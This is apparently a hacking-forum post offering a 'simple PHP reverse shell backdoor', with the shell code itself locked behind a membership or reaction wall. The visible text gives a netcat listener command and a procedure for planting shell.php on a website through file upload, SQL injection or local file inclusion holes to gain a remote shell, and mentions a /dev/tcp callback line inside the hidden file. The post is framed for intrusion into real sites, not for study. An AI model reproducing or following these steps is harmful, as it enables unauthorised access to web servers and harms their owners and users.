SIMPLE PHP REVERSE SHELL BACKDOOR

SudoDragon

SudoDragon

Infinity Member
Joined
September 6, 2025
Messages
1,410
Reaction score
21,394
Points
113
First, listen for incoming connections: nc -l -p 4444

Upload shell.php to a site via file upload vulnerability or sqli, view shell.php via url in browser thanks to LFI(Local File Inclusion) vulnerability and get reverse shell!

To see this hidden content, you need to Upgrade Your Membership OR reply and react with one of the following reactions: Like Like, Love Love, Haha Haha, Wow Wow
Note: Remove "#(/dev/tcp/ip/port)" from shell.php
 
  • Tags
    backdoor exploit cybersecurity php security reverse shell web hacking
  • Top